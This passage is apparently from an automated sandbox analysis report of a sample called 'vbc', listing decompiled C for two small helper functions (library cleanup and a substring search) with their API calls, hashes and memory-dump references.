                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B57() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x42b22c;
                                                				_t3 = E00403B3C(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                				return _t3;
                                                			}







                                                0x00403b58
                                                0x00403b60
                                                0x00403b67
                                                0x00403b6a
                                                0x00403b6a
                                                0x00403b6c
                                                0x00403b71
                                                0x00403b78
                                                0x00403b7e
                                                0x00403b82
                                                0x00403b83
                                                0x00403b8b

                                                APIs
                                                • FreeLibrary.KERNEL32(?,74EDD4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4017390910
                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405fa2
                                                0x00405fa4
                                                0x00405fa7
                                                0x00405fd3
                                                0x00405fac
                                                0x00405fb5
                                                0x00405fba
                                                0x00405fc5
                                                0x00405fc8
                                                0x00405fe4
                                                0x00405fca
                                                0x00405fd1
                                                0x00000000
                                                0x00405fd1
                                                0x00405fdd
                                                0x00405fe1
                                                0x00405fe1
                                                0x00405fdb
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                • CharNextA.USER32(00000000), ref: 00405FCB
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%